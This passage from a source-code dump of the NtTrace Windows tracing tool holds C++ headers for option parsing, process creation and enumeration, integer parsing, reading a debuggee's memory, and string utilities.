*PLPC_MESSAGE; 112 | 113 | #endif // NtDllStruct_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/Options.h: -------------------------------------------------------------------------------- 1 | #ifndef OPTIONS_H_ 2 | #define OPTIONS_H_ 3 | 4 | /** 5 | @file 6 | Provide command line option handling. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1428 $ 25 | */ 26 | 27 | // $Id: Options.h 1428 2014-10-04 21:55:56Z Roger $ 28 | 29 | #include 30 | #include 31 | 32 | /** Namespace for general utility classes and functions */ 33 | namespace or2 34 | { 35 | 36 | /** 37 | * Class to handle command line options. 38 | * 39 | * This class is designed to handle simple command lines where a set of options (sometimes called flags) 40 | * precede a list of non-flag arguments. 41 | * 42 | * Options are identified by starting with either '-' or '/', and the option name is one or more characters. 43 | *
44 | * Options can be declared as 'bool', 'int', 'unsigned int', 'long', 'unsigned long', 'double' or 'string'. For all 45 | * types other than 'bool' the value is supplied as the next command line argument. 46 | * 47 | * The number of (non-flag) arguments can be specified either as a single number 48 | * or a range of values, which can be open ended. Once option processing is complete 49 | * the remaining arguments are available using STL iterators obtained from the begin() and end() 50 | * methods. 51 | * 52 | * Three in-built options are supported:
    53 | *
  • -h (or -?) displays syntax help for the command line. 54 | *
  • -ver prints the version string (provided in the constructor - typically an RCS 'Id' string) 55 | *
  • -- terminates flag processing and allows non-flag arguments which start with '-' or '/' 56 | *
57 | * 58 | * Example: 59 | *

 60 |  *   Options opt( rcsId );
 61 |  *   opt.set( "b", &boolValue, "batch mode" );
 62 |  *   opt.set( "i", &intValue, "number of repeats" );
 63 |  *   if  (! opt.process( argc, argv, "This program does something" ) )
 64 |  *       return 1;
 65 |  *   for ( Options::const_iterator it = opts.begin();
 66 |  *         it != opts.end(); ++it )
 67 |  *   { // do something with *it }
 68 |  *
69 | * This example code will successfully cope with command lines like this:
    70 | *
  • program.exe
    71 | * [no flags set, no iterations round the loop] 72 | *
  • program.exe -b -i 42 fred joe bill
    73 | * [boolValue set to true, intValue set to 42, 3 iterations round the loop] 74 | *
  • program.exe -i 12 -- -i -j
    75 | * [intValue set to 12, 2 iterations round the loop] 76 | *
  • program.exe -h
    77 | * This prints: 78 | *
    Syntax: program.exe [-b] [-i #]
     79 |  *
     80 |  *  Options:
     81 |  *    -b batch mode
     82 |  *    -i number of repeats
     83 |  *
     84 |  *  This program does something
    85 | *
86 | */ 87 | class Options 88 | { 89 | public: 90 | /** 91 | * Construct from rcs ID - for version info. 92 | * 93 | * The supplied string is automatically printed when the -ver option is used. 94 | */ 95 | Options( char const * pRcsId ); 96 | 97 | /** Destructor */ 98 | ~Options(); 99 | 100 | /** Set a 'bool' option */ 101 | void set( std::string const & option, bool * pValue, std::string const & helpString = "" ); 102 | 103 | /** Set an 'int' option */ 104 | void set( std::string const & option, int * pValue, std::string const & helpString = "" ); 105 | 106 | /** Set an 'unsigned int' option */ 107 | void set( std::string const & option, unsigned int * pValue, std::string const & helpString = "" ); 108 | 109 | /** Set a 'long' option */ 110 | void set( std::string const & option, long * pValue, std::string const & helpString = "" ); 111 | 112 | /** Set an 'unsigned long' option */ 113 | void set( std::string const & option, unsigned long * pValue, std::string const & helpString = "" ); 114 | 115 | /** Set an 'double' option */ 116 | void set( std::string const & option, double * pValue, std::string const & helpString = "" ); 117 | 118 | /** Set a 'string' option */ 119 | void set( std::string const & option, std::string * pValue, std::string const & helpString = ""); 120 | 121 | /** Set argument count (-1 => any number) */ 122 | void setArgs( int argCount, std::string const & helpString = "" ); 123 | 124 | /** Set argument count - min and max (-1 => any number) */ 125 | void setArgs( int argCountMin, int argCountMax, std::string const & helpString = "" ); 126 | 127 | /** Process the command line arguments, return false on bad argument or 'help' */ 128 | bool process( int argc, char ** argv, std::string const & usage = "" ); 129 | 130 | /** Get program name */ 131 | std::string pname() const; 132 | 133 | /** Iterator type returned by begin/end */ 134 | typedef std::vector::const_iterator const_iterator; 135 | 136 | /** Start of non-option arguments */ 137 | 
const_iterator begin() const; 138 | 139 | /** End of non-option arguments */ 140 | const_iterator end() const; 141 | 142 | private: 143 | // no copy/assign 144 | Options( Options const & ); 145 | Options & operator=( Options const & ); 146 | 147 | struct Data; 148 | Data * pData; 149 | }; 150 | 151 | } 152 | 153 | // include the implementation 154 | #include "Options.inl" 155 | 156 | #endif // OPTIONS_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/ProcessHelper.h: -------------------------------------------------------------------------------- 1 | #ifndef ProcessHelper_H_ 2 | #define ProcessHelper_H_ 3 | 4 | /** 5 | @file 6 | Helper functions for process management. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003 11 | 12 | This software is distributed in the hope that it will be useful, but 13 | without WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 15 | 16 | Permission is granted to anyone to make or distribute verbatim 17 | copies of this software provided that the copyright notice and 18 | this permission notice are preserved, and that the distributor 19 | grants the recipient permission for further distribution as permitted 20 | by this notice. 21 | 22 | Comments and suggestions are always welcome. 23 | Please report bugs to rogero@howzatt.demon.co.uk. 24 | 25 | $Revision: 1405 $ 26 | */ 27 | 28 | // $Id: ProcessHelper.h 1405 2013-11-12 23:57:17Z Roger $ 29 | 30 | 31 | #pragma warning( disable: 4786 ) 32 | 33 | #include // for CreateProcess 34 | #include // for EnumProcesses 35 | #include // for tolower 36 | #include // for transform 37 | #include 38 | #include 39 | #include 40 | 41 | #include "Options.h" 42 | #include "readInt.h" 43 | 44 | namespace or2 45 | { 46 | 47 | ////////////////////////////////////////////////////////////////////////// 48 | /** Wrapper for create process. 
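 *
 * The first string in [it, end) is the program (resolved with SearchPath);
 * the remaining strings are its arguments, each quoted so that the child's
 * argv parsing yields the original string again.
 *
 * @return
 * - 0 on success
 * - non-zero on failure, and GetLastError() can be used
 */

//////////////////////////////////////////////////////////////////////////
// Pieces shared by CreateProcessHelper and CreateProcessAsUserHelper.
// (The two wrappers previously carried identical copies of this code.)

/**
 * Append one argument to a command line, quoted for the Microsoft CRT's
 * argv rules: an argument that is empty or contains whitespace or '"' is
 * wrapped in quotes, embedded quotes are escaped with a backslash, and
 * backslashes that precede a quote (or the closing quote) are doubled.
 * Any other argument is appended unchanged, as before.
 */
inline
void AppendQuotedArgument( std::string & cmdLine, std::string const & arg )
{
    if ( ! arg.empty() && arg.find_first_of( " \t\n\v\"" ) == std::string::npos )
    {
        cmdLine += arg;
        return;
    }

    cmdLine += '"';
    std::string::const_iterator ch = arg.begin();
    for ( ;; )
    {
        size_t backslashes = 0;
        while ( ch != arg.end() && *ch == '\\' )
        {
            ++ch;
            ++backslashes;
        }

        if ( ch == arg.end() )
        {
            // trailing backslashes would otherwise escape the closing quote
            cmdLine.append( backslashes * 2, '\\' );
            break;
        }
        if ( *ch == '"' )
        {
            // backslashes before a quote are only literal when doubled
            cmdLine.append( backslashes * 2 + 1, '\\' );
        }
        else
        {
            cmdLine.append( backslashes, '\\' );
        }
        cmdLine += *ch;
        ++ch;
    }
    cmdLine += '"';
}

/** Join [it, end) into a single space-separated command line (program name first) */
inline
std::string BuildCommandLine( Options::const_iterator it, Options::const_iterator end )
{
    std::string cmdLine;
    for ( ; it != end; ++it )
    {
        if ( cmdLine.length() )
            cmdLine += " ";
        AppendQuotedArgument( cmdLine, *it );
    }
    return cmdLine;
}

/**
 * Resolve a program name to a full path, much as a shell would.
 *
 * SearchPath with a NULL path looks in the application, current and system
 * directories and then PATH, adding ".exe" when no extension is given -- so
 * an unqualified name can resolve to a file in the current directory.
 * The name is returned unchanged when nothing is found (or the result does
 * not fit in MAX_PATH); CreateProcess then reports the failure.
 */
inline
std::string ResolveExecutable( std::string const & name )
{
    char szFullName[ MAX_PATH ];
    DWORD const len = SearchPath( NULL, name.c_str(), ".exe", sizeof( szFullName ), szFullName, 0 );
    // SearchPath returns the required size (not a filled buffer) when the buffer is too small
    if ( len != 0 && len < sizeof( szFullName ) )
        return szFullName;
    return name;
}

/** STARTUPINFO used by both wrappers: show the main window normally (assists GUI programs) */
inline
void InitStartupInfo( STARTUPINFO & startupInfo )
{
    STARTUPINFO const empty = { sizeof( startupInfo ) };
    startupInfo = empty;
    startupInfo.dwFlags = STARTF_USESHOWWINDOW;
    startupInfo.wShowWindow = SW_SHOWNORMAL;
}

/**
 * Wrapper for create process.
 *
 * @return
 * - 0 on success
 * - non-zero on failure, and GetLastError() can be used
 */
inline
int CreateProcessHelper(
    Options::const_iterator it, ///< first string is command
    Options::const_iterator end, ///< rest of iteration are arguments
    DWORD create_options = 0, ///< options for CreateProcess
    PROCESS_INFORMATION* pProcessInformation = 0 ) ///< returned process information on success
{
    if ( it == end )
    {
        // nothing to run: report a failed call rather than dereferencing 'end'
        SetLastError( ERROR_INVALID_PARAMETER );
        return 1;
    }

    std::string const executable = ResolveExecutable( *it );
    std::string const cmdLine = BuildCommandLine( it, end );
    // CreateProcess takes a writable command line buffer, so do not pass c_str() cast away from const
    std::vector< char > cmdBuffer( cmdLine.begin(), cmdLine.end() );
    cmdBuffer.push_back( '\0' );

    STARTUPINFO startupInfo;
    InitStartupInfo( startupInfo );
    PROCESS_INFORMATION ProcessInformation;

    if ( ! CreateProcess(
        executable.c_str(), // name of executable module
        &cmdBuffer[0], // command line string
        0, // SD
        0, // SD
        TRUE, // handle inheritance option: inheritable handles of this process are passed to the child
        create_options, // creation flags
        0, // new environment block
        0, // current directory name
        &startupInfo, // startup information
        &ProcessInformation // process information
        ) )
    {
        return 1;
    }

    if ( pProcessInformation )
        *pProcessInformation = ProcessInformation;
    else
    {
        // caller does not want the handles, so do not leak them
        CloseHandle( ProcessInformation.hProcess );
        CloseHandle( ProcessInformation.hThread );
    }

    return 0;
}

//////////////////////////////////////////////////////////////////////////
/** Wrapper for create process as user.
 *
 * Behaves as CreateProcessHelper, but the child runs with the security
 * token 'hToken' (see CreateProcessAsUser).
 *
 * @return
 * - 0 on success
 * - non-zero on failure, and GetLastError() can be used
 */

inline
int CreateProcessAsUserHelper(
    HANDLE hToken, ///< security token to use for target process
    Options::const_iterator it, ///< first string is command
    Options::const_iterator end, ///< rest of iteration are arguments
    DWORD create_options = 0, ///< options for CreateProcess
    PROCESS_INFORMATION* pProcessInformation = 0 ) ///< returned process information on success
{
    if ( it == end )
    {
        // nothing to run: report a failed call rather than dereferencing 'end'
        SetLastError( ERROR_INVALID_PARAMETER );
        return 1;
    }

    std::string const executable = ResolveExecutable( *it );
    std::string const cmdLine = BuildCommandLine( it, end );
    // CreateProcessAsUser takes a writable command line buffer
    std::vector< char > cmdBuffer( cmdLine.begin(), cmdLine.end() );
    cmdBuffer.push_back( '\0' );

    STARTUPINFO startupInfo;
    InitStartupInfo( startupInfo );
    PROCESS_INFORMATION ProcessInformation;

    if ( ! CreateProcessAsUser(
        hToken,
        executable.c_str(), // name of executable module
        &cmdBuffer[0], // command line string
        0, // SD
        0, // SD
        TRUE, // handle inheritance option: inheritable handles of this process are passed to the child
        create_options, // creation flags
        0, // new environment block
        0, // current directory name
        &startupInfo, // startup information
        &ProcessInformation // process information
        ) )
    {
        return 1;
    }

    if ( pProcessInformation )
        *pProcessInformation = ProcessInformation;
    else
    {
        // caller does not want the handles, so do not leak them
        CloseHandle( ProcessInformation.hProcess );
        CloseHandle( ProcessInformation.hThread );
    }

    return 0;
}

/** tolower for a single char without undefined behaviour on negative char values */
inline
char ToLowerChar( char ch )
{
    return static_cast< char >( tolower( static_cast< unsigned char >( ch ) ) );
}

//////////////////////////////////////////////////////////
/** Returns all process IDs matching 'pattern'.
 *
 * A pattern that parses as an integer (readInt) is taken to be a process id
 * and is returned as-is. Otherwise every process that can be opened is
 * matched by a case-insensitive substring search of its main module name
 * against the pattern; a null or empty pattern matches every process.
 *
 * @return a vector of all matching process IDs
 */
inline
std::vector< DWORD > FindProcesses( const char *pattern = 0 ///< pattern to match for process name
    )
{
    std::vector< DWORD > ret;

    int pid(0);

    if ( ( pattern != 0 ) && ( readInt(pattern, pid ) ) )
    {
        ret.push_back( (DWORD)pid );
        return ret;
    }

    // EnumProcesses gives no 'buffer too small' indication: when cbNeeded
    // equals the buffer size the list may have been truncated, so grow the
    // buffer until it is strictly larger than what was returned.
    std::vector< DWORD > aProcesses( 1024 );
    DWORD cbNeeded = 0;
    for ( ;; )
    {
        DWORD const cbBuffer = static_cast< DWORD >( aProcesses.size() * sizeof( DWORD ) );
        if ( !EnumProcesses( &aProcesses[0], cbBuffer, &cbNeeded ) )
            return ret;
        if ( cbNeeded < cbBuffer )
            break;
        aProcesses.resize( aProcesses.size() * 2 );
    }

    // Calculate how many process identifiers were returned.
    DWORD const cProcesses = cbNeeded / sizeof(DWORD);

    std::string lowerPattern( pattern == 0 ? "" : pattern );
    std::transform( lowerPattern.begin(), lowerPattern.end(), lowerPattern.begin(), ToLowerChar );

    for ( DWORD iProcess = 0; iProcess < cProcesses; iProcess++ )
    {
        DWORD const processID( aProcesses[iProcess] );

        // Open the process to query the main module name;
        // processes we lack access to are silently skipped.

        if ( HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
                                            PROCESS_VM_READ,
                                            FALSE, processID ) )
        {
            char szModName[MAX_PATH];

            // Get the module's file name (GetProcessImageFileName, when
            // available, returns a device path; substring matching still works).

            if ( GetModuleBaseName( hProcess, 0, szModName, sizeof( szModName ) )
#ifdef GetProcessImageFileName
                || GetProcessImageFileName(hProcess, szModName, sizeof( szModName ) )
#endif // GetProcessImageFileName
                )
            {
                std::string lower( szModName );
                std::transform( lower.begin(), lower.end(), lower.begin(), ToLowerChar );
                if ( ( lowerPattern.length() == 0 ) || ( lower.find( lowerPattern ) != std::string::npos ) )
                {
                    // Return the process identifier.
                    ret.push_back( processID );
                }
            }

            CloseHandle( hProcess );
        }
    }

    return ret;
}

}

#endif // ProcessHelper_H_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/ReadInt.h:
--------------------------------------------------------------------------------
#ifndef readInt_h_
#define readInt_h_

/**
@file
Helper function for reading a string into an integer.

@author Roger Orr

Copyright © 2004

This software is distributed in the hope that it will be useful, but
without WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.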
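
Permission is granted to anyone to make or distribute verbatim
copies of this software provided that the copyright notice and
this permission notice are preserved, and that the distributor
grants the recipient permission for further distribution as permitted
by this notice.

Comments and suggestions are always welcome.
Please report bugs to rogero@howzatt.demon.co.uk.

$Revision: 1405 $
*/

// $Id: ReadInt.h 1405 2013-11-12 23:57:17Z Roger $

#include <cctype>  // for isspace
#include <cerrno>  // for errno, ERANGE
#include <climits> // for INT_MIN, INT_MAX, UINT_MAX
#include <cstdlib> // for strtol, strtoul
#include <string>  // for string

namespace or2
{

/** Find where the digits of 'value' begin and which base they are in.
 *
 * A leading "0x" or "0X" selects hexadecimal and is skipped; otherwise the
 * whole string is treated as decimal.
 *
 * @return pointer into value.c_str() at the first character to convert
 */
inline
char const * readIntStart(
    std::string const & value, ///< value to convert
    int & base )               ///< set to 16 for a 0x-prefixed value, else 10
{
    if ( ( value.length() >= 2 ) &&
         ( value[0] == '0' ) &&
         ( value[1] == 'x' || value[1] == 'X' ) )
    {
        base = 16;
        return value.c_str() + 2;
    }
    base = 10;
    return value.c_str();
}

/** True if the text at 'start' denotes a negative number (optional leading
 * whitespace followed by '-'), which strtoul and friends would otherwise
 * silently negate into a large unsigned value.
 */
inline
bool readIntIsNegative( char const * start ) ///< first character passed to the strto* function
{
    while ( isspace( (unsigned char)*start ) )
        ++start;
    return *start == '-';
}

/** Shared success test for the readInt overloads.
 *
 * The conversion counts as successful only if at least one character was
 * consumed (so "", "   " and a bare "0x" are rejected instead of being read
 * as 0), nothing but the terminating NUL follows the number, and the strto*
 * call did not report overflow. errno must be cleared before that call.
 */
inline
bool readIntComplete(
    char const * start,  ///< first character passed to the strto* function
    char const * delim ) ///< end pointer returned by the strto* function
{
    return ( delim != start ) && ( *delim == '\0' ) && ( errno != ERANGE );
}

/** Convert a string into an integer.
 *
 * Allows string to start with 0x to imply hexadecimal values. Hexadecimal is
 * read as an unsigned 32-bit value which then wraps into the int, so full
 * width masks such as 0xFFFFFFFF are accepted (as -1).
 *
 * @return
 * - true on successful conversion
 * - false on failure: empty input, trailing garbage, or a value outside
 *   the range of int
 */
inline
bool readInt(
    std::string const & value, ///< value to convert
    int & result )             ///< returned result if successful conversion, otherwise partial result
{
    int base = 10;
    char const * const start = readIntStart( value, base );
    char * delim = 0;
    errno = 0;

    if ( base == 16 )
    {
        unsigned long const v = strtoul( start, &delim, 16 );
        result = (int)v;
        // reject "0x-..." and, where unsigned long is wider than 32 bits,
        // values that would not survive the cast to int
        if ( readIntIsNegative( start ) || v > 0xFFFFFFFFul )
            return false;
    }
    else
    {
        long const v = strtol( start, &delim, 10 );
        result = (int)v;
        if ( v < INT_MIN || v > INT_MAX )
            return false;
    }

    return readIntComplete( start, delim );
}

/** Convert a string into an unsigned integer.
 *
 * Allows string to start with 0x to imply hexadecimal values. A leading
 * minus sign is rejected rather than being wrapped into a large value.
 *
 * @return
 * - true on successful conversion
 * - false on failure: empty input, trailing garbage, a negative number, or a
 *   value outside the range of unsigned int
 */
inline
bool readInt(
    std::string const & value, ///< value to convert
    unsigned int & result )    ///< returned result if successful conversion, otherwise partial result
{
    int base = 10;
    char const * const start = readIntStart( value, base );
    char * delim = 0;
    errno = 0;

    unsigned long const v = strtoul( start, &delim, base );
    result = (unsigned int)v;
    if ( readIntIsNegative( start ) || v > UINT_MAX )
        return false;

    return readIntComplete( start, delim );
}

#if _MSC_VER >= 1500
/** Convert a string into a long long integer.
 *
 * Allows string to start with 0x to imply hexadecimal values. As for int,
 * hexadecimal is read unsigned and wraps into the signed result, so 64-bit
 * values with the top bit set are accepted.
 *
 * @return
 * - true on successful conversion
 * - false on failure: empty input, trailing garbage, or overflow
 */
inline
bool readInt(
    std::string const & value, ///< value to convert
    LONGLONG & result )        ///< returned result if successful conversion, otherwise partial result
{
    int base = 10;
    char const * const start = readIntStart( value, base );
    char * delim = 0;
    errno = 0;

    if ( base == 16 )
    {
        result = (LONGLONG)_strtoui64( start, &delim, 16 );
        if ( readIntIsNegative( start ) )
            return false;
    }
    else
    {
        result = _strtoi64( start, &delim, 10 );
    }

    return readIntComplete( start, delim );
}
#endif // _MSC_VER >= 1500

}

#endif // readInt_h_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/ReadPartialMemory.h:
--------------------------------------------------------------------------------
#ifndef READPARTIALMEMORY_H_
#define READPARTIALMEMORY_H_

/**@file

Function to read partial memory buffer from a target process

@author Roger Orr

Copyright © 2011.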
11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: ReadPartialMemory.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #include 30 | 31 | namespace or2 32 | { 33 | /** 34 | * Reads data from an area of memory in a specified process. 35 | * 36 | * The area to be read need only be partially accessible. 37 | * The function reads the largest contiguous amount of data from 'address' and 38 | * succeeds if this length is in [minSize, maxSize]. 39 | * 40 | * @return the number of bytes read. 
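Zero implies failure - use GetLastError() for details
 *
 * @note a minSize of 0 is not useful: a zero-length read returns 0, which the
 *       caller cannot distinguish from failure. The retry loop stops at a
 *       length of 0 rather than wrapping the length around.
 */
inline
SIZE_T ReadPartialProcessMemory(
    HANDLE hProcess, ///< Handle to process to read (needs PROCESS_VM_READ access)
    LPCVOID address, ///< Base address of area to read
    LPVOID buffer,   ///< Buffer to hold read data
    SIZE_T minSize,  ///< Minimum amount to read for success
    SIZE_T maxSize)  ///< Maximum size of buffer
{
    // The page size is needed to step the request back to a page boundary;
    // fetch it once rather than on every retry.
    static SYSTEM_INFO SystemInfo;
    static BOOL b = (GetSystemInfo(&SystemInfo), TRUE);

    SIZE_T length = maxSize;
    while (length >= minSize)
    {
        if ( ReadProcessMemory(hProcess, address, buffer, length, 0) )
        {
            return length;
        }

        // Nothing shorter is left to try. Without this check 'length--' below
        // wraps to SIZE_MAX when minSize is 0, and the loop then issues a huge
        // number of failing reads before the page arithmetic breaks out.
        if (length == 0)
            break;
        length--;

        // ReadProcessMemory fails if any part of the range is inaccessible, so
        // shrink the request to stop at the start of the page holding the last
        // byte just requested, and try again.
        SIZE_T pageOffset = ((ULONG_PTR)address + length) % SystemInfo.dwPageSize;
        if (pageOffset > length)
            break;
        length -= pageOffset;
    }
    return 0;
}


} // namespace

#endif // READPARTIALMEMORY_H_

--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/ShowData.h:
--------------------------------------------------------------------------------
#ifndef SHOWDATA_H_
#define SHOWDATA_H_

/**@file

Functions to handle showing data from another process

@author Roger Orr

Copyright © 2002, 2003.
This software is distributed in the hope that it will be useful, but
without WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Permission is granted to anyone to make or distribute verbatim
copies of this software provided that the copyright notice and
this permission notice are preserved, and that the distributor
grants the recipient permission for further distribution as permitted
by this notice.

Comments and suggestions are always welcome.
Please report bugs to rogero@howzatt.demon.co.uk.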
23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | #include 28 | #include 29 | 30 | // or2 includes 31 | #include // For Nt native data types 32 | 33 | /** namespace for functions showing data from another process */ 34 | namespace showData 35 | { 36 | /** show a DWORD from the debuggee */ 37 | void showDword( std::ostream & os, ULONG_PTR value ); 38 | 39 | /** show a BOOL from the debuggee */ 40 | void showBoolean( std::ostream & os, BOOLEAN value ); 41 | 42 | /** Show an enumeration name, if available */ 43 | void showEnum(std::ostream & os, ULONG_PTR value, std::string const & enumName); 44 | 45 | /** Show an mask enumeration name, if available */ 46 | void showMask(std::ostream & os, ULONG_PTR value, std::string const & enumName); 47 | 48 | /** show an HRESULT from the debuggee */ 49 | void showWinError( std::ostream & os, HRESULT hResult ); 50 | 51 | /** show an image name from the debuggee (in ANSI or Unicode) */ 52 | bool showName( std::ostream & os, HANDLE hProcess, LPVOID lpImageName, bool bUnicode ); 53 | 54 | /** 55 | * Show a string from the debuggee (in ANSI or Unicode) 56 | * @return true if ends with a newline, false if not 57 | */ 58 | bool showString( std::ostream & os, HANDLE hProcess, LPVOID lpString, bool bUnicode, WORD nStringLength ); 59 | 60 | /** show Object Attrributes from the debuggee */ 61 | void showObjectAttributes( std::ostream & os, HANDLE hProcess, LPVOID pvoid ); 62 | 63 | /** show an Unicode string from the debuggee */ 64 | void showUnicodeString( std::ostream & os, HANDLE hProcess, PUNICODE_STRING pTargetUnicodeString ); 65 | 66 | /** show a generic pointer from the debuggee */ 67 | void showPointer( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 68 | 69 | /** show a pointer to handle from the debuggee */ 70 | void showPHandle( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 71 | 72 | /** show a pointer to USHORT from the debuggee */ 73 | void showPUshort( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 74 | 
75 | /** show a pointer to ULONG from the debuggee */ 76 | void showPUlong( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 77 | 78 | /** show an access mask from the debuggee */ 79 | void showAccessMask( std::ostream & os, HANDLE hProcess, ULONG_PTR argVal ); 80 | 81 | /** show a client ID from the debuggee */ 82 | void showPClientId( std::ostream & os, HANDLE hProcess, PCLIENT_ID pClientId ); 83 | 84 | /** show an OP status block from the debuggee */ 85 | void showPIoStatus( std::ostream & os, HANDLE hProcess, PIO_STATUS_BLOCK pIoStatusBlock ); 86 | 87 | /** show a large integer from the debuggee */ 88 | void showPLargeInteger( std::ostream & os, HANDLE hProcess, PLARGE_INTEGER pLargeInteger ); 89 | 90 | /** Display an LPC message */ 91 | void showPLpcMessage(std::ostream & os, HANDLE hProcess, PLPC_MESSAGE pLpcMessage); 92 | 93 | /** show file attributes from the debuggee */ 94 | void showFileAttributes( std::ostream & os, ULONG argVal ); 95 | 96 | /** show file basic information from the debuggee */ 97 | void showPFileBasicInfo( std::ostream & os, HANDLE hProcess, PFILE_BASIC_INFORMATION pFileBasicInfo ); 98 | 99 | /** show network open information from the debuggee */ 100 | void showPFileNetworkInfo( std::ostream & os, HANDLE hProcess, PFILE_NETWORK_OPEN_INFORMATION pFileNetworkInfo ); 101 | 102 | /** Convert msvc throw information into a type name */ 103 | void showThrowType( std::ostream & os, HANDLE hProcess, ULONG_PTR throwInfo, ULONG_PTR base ); 104 | } 105 | 106 | #endif // SHOWDATA_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/SimpleTokenizer.h: -------------------------------------------------------------------------------- 1 | #ifndef SimpleTokenizer_h_ 2 | #define SimpleTokenizer_h_ 3 | 4 | /** 5 | @file 6 | Turn a string delimited by a given character into a vector of strings. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 
11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | #include 28 | #include 29 | 30 | namespace or2 31 | { 32 | 33 | //////////////////////////////////////////////////////////////// 34 | /** Turn a string delimited by a given character into a vector of strings. 35 | * 36 | * EXAMPLE
37 |  *    \#include "SimpleTokenizer.h"
38 |  *    ...
39 |  *    std::vector\< std::string \> sv;
40 |  *
41 |  *    SimpleTokenizer( "This is a test", &sv, ' ' );
42 |  *
43 |  *    std::copy( sv.begin(), sv.end(),
 44 |  *        std::ostream_iterator\< std::string \>( std::cout, "\n" ) );
45 |  *    
 *
 */
inline
void SimpleTokenizer(
    std::string const & str,              ///< string to tokenize
    std::vector< std::string > * pTokens, ///< vector to populate
    char delim = ',' )                    ///< delimiter for strings
{
    // Walk the string one delimiter at a time. An empty field between two
    // delimiters (or before the first) yields an empty token; a delimiter at
    // the very end does not add a trailing empty token.
    std::string::size_type from = 0;
    std::string::size_type const total = str.size();

    while ( from < total )
    {
        std::string::size_type const upto = str.find( delim, from );
        if ( upto == std::string::npos )
        {
            // no further delimiter: the remainder is the final token
            pTokens->push_back( str.substr( from ) );
            break;
        }
        pTokens->push_back( str.substr( from, upto - from ) );
        from = upto + 1;
    }
}

}

#endif // SimpleTokenizer_h_

--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/StrFromWchar.h:
--------------------------------------------------------------------------------
#ifndef STRFROMWCHAR_H_
#define STRFROMWCHAR_H_

/**@file

Function to create a std::string from a wide string.

@author Roger Orr

Copyright © 2005.
This software is distributed in the hope that it will be useful, but
without WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Permission is granted to anyone to make or distribute verbatim
copies of this software provided that the copyright notice and
this permission notice are preserved, and that the distributor
grants the recipient permission for further distribution as permitted
by this notice.

Comments and suggestions are always welcome.
Please report bugs to rogero@howzatt.demon.co.uk.
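
$Revision: 1405 $
*/

// $Id: StrFromWchar.h 1405 2013-11-12 23:57:17Z Roger $

#include <cstdlib> // for wcstombs, mbstowcs
#include <cstring> // for strlen
#include <cwchar>  // for wcslen
#include <string>
#include <vector>

#pragma warning( push )
#pragma warning( disable: 4996 ) // 'wcstombs' was declared deprecated

namespace or2
{

///////////////////////////////////////////////////////////////////////////////
/**
 * Convert wide string to MB string using the current C locale.
 *
 * The return value of wcstombs is not checked: if a character cannot be
 * represented in the current locale the conversion stops and the result is
 * whatever was produced before that point.
 *
 * @param wString the (NUL terminated) wide character array to convert
 * @return a MBCS string
 */
inline
std::string strFromWchar( wchar_t const * const wString )
{
    size_t const len = wcslen( wString ) + 1;
    // Allow sizeof(wchar_t) output bytes per character; wcstombs never writes
    // more than nBytes, so a larger expansion is cut short, not overflowed.
    size_t const nBytes = len * sizeof( wchar_t );
    // value-initialised, so the buffer is NUL terminated even if wcstombs
    // fills it completely or gives up part way through
    std::vector< char > chArray( nBytes );
    wcstombs( &chArray[0], wString, nBytes );
    return std::string( &chArray[0] );
}

///////////////////////////////////////////////////////////////////////////////
/**
 * Convert MB string to wide string using the current C locale.
 *
 * As for strFromWchar the return value of mbstowcs is not checked, so an
 * invalid multibyte sequence yields a result truncated at that point.
 *
 * @param mbString the (NUL terminated) multi byte character array to convert
 * @return a wide string
 */
inline
std::wstring wstrFromMBchar( char const * const mbString )
{
    size_t const len = strlen( mbString ) + 1;
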